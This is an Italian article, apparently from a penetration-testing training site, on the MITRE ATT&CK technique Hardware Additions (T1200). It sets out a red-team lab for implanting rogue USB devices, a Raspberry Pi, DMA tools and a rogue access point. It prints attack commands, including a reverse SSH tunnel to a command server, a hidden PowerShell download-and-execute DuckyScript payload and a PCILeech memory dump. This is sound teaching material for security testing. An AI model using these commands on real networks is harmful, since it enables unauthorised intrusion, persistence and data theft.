Dispositivi Hardware Malevoli: Hardware Additions (T1200)

La tecnica Hardware Additions consiste nell'introduzione fisica di dispositivi — chiavette USB modificate, single-board computer, adattatori di rete, tap passivi — all'interno del perimetro di un'organizzazione per ottenere un punto d'appoggio iniziale sulla rete. Si colloca nella tattica Initial Access (TA0001), la fase in cui l'avversario cerca di mettere piede nell'ambiente bersaglio.

A differenza della semplice distribuzione di payload tramite supporti rimovibili, questa tecnica introduce hardware con funzionalità attive: keystroke injection per digitare comandi in pochi secondi, accesso diretto alla memoria del kernel via DMA attraverso porte Thunderbolt o PCIe, creazione di punti d'accesso wireless non autorizzati, intercettazione passiva del traffico di rete. Il dispositivo diventa un impianto fisico persistente, spesso invisibile ai controlli software tradizionali.

I riferimenti pubblici a operazioni reali condotte da threat actor sono limitati, ma il framework documenta 1 gruppo APT che ha impiegato questa tecnica in campagne contro istituzioni finanziarie. Sul versante offensivo, i team di penetration testing la adottano regolarmente con prodotti commerciali e open source. Il panorama delle 2 mitigazioni disponibili si concentra sulla limitazione dell'installazione hardware e sul controllo degli accessi di rete — due pilastri che, se implementati correttamente, riducono drasticamente la superficie d'attacco fisica.


L'obiettivo in laboratorio è simulare l'intera catena: collegamento fisico, enumerazione della rete locale, e pivot verso risorse interne. Servono dispositivi reali e un ambiente controllato con VLAN segmentate.

Piattaforme di attacco fisico

Il punto di partenza più comune è Bash Bunny di Hak5 (a pagamento), un dispositivo USB che emula contemporaneamente tastiera HID, storage di massa e adattatore Ethernet. Inserendolo in una workstation sbloccata, può eseguire payload DuckyScript in pochi secondi. In alternativa, P4wnP1 A.L.O.A. (open source) trasforma un Raspberry Pi Zero W in un impianto multi-funzione: HID, Ethernet over USB, Wi-Fi rogue AP. La configurazione avviene via interfaccia web integrata.

Per simulare lo scenario DarkVishnya — il gruppo che ha fisicamente collegato Bash Bunny, Raspberry Pi e netbook economici alla rete locale delle organizzazioni target — il setup ideale prevede un Raspberry Pi con sistema operativo Kali Linux connesso via cavo Ethernet a una porta di rete in un'area comune (sala riunioni, stampanti). Il dispositivo ottiene un lease DHCP e apre un tunnel reverse SSH verso un server C2 esterno.

Catena d'attacco passo per passo

Una volta connesso il Raspberry Pi alla rete, la sequenza operativa si sviluppa così. Prima si verifica la connettività e l'indirizzo ottenuto:

ip addr show eth0

Poi si avvia la scansione della subnet locale con Nmap (open source) per identificare host attivi e servizi esposti:

nmap -sn 192.168.1.0/24 -oG discovery.txt

Il passo successivo è stabilire persistenza con un tunnel reverse SSH verso il server C2 controllato dal red team:

ssh -R 4443:localhost:22 operatore@c2-server -fN

Per lo scenario keystroke injection con Bash Bunny, un payload DuckyScript minimale apre PowerShell e scarica un agent:

DELAY 2000 GUI r DELAY 500 STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('')" ENTER

Scenari DMA e rogue access point

Per testare attacchi DMA via Thunderbolt, PCILeech (open source) consente la lettura diretta della memoria del kernel tramite schede FPGA collegate a porte Thunderbolt o M.2. Il comando base per il dump della memoria fisica è:

pcileech dump -out memory.raw -device fpga

Infine, per il rogue wireless AP, hostapd (open source) su Raspberry Pi crea un punto d'accesso con SSID identico a quello aziendale, combinato con dnsmasq (open source) per il DHCP. Questo simula l'aggiunta di infrastruttura wireless non autorizzata alla rete.

Documentate ogni passo con screenshot e timestamp: il report deve dimostrare che un accesso fisico non controllato equivale a un accesso logico completo.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.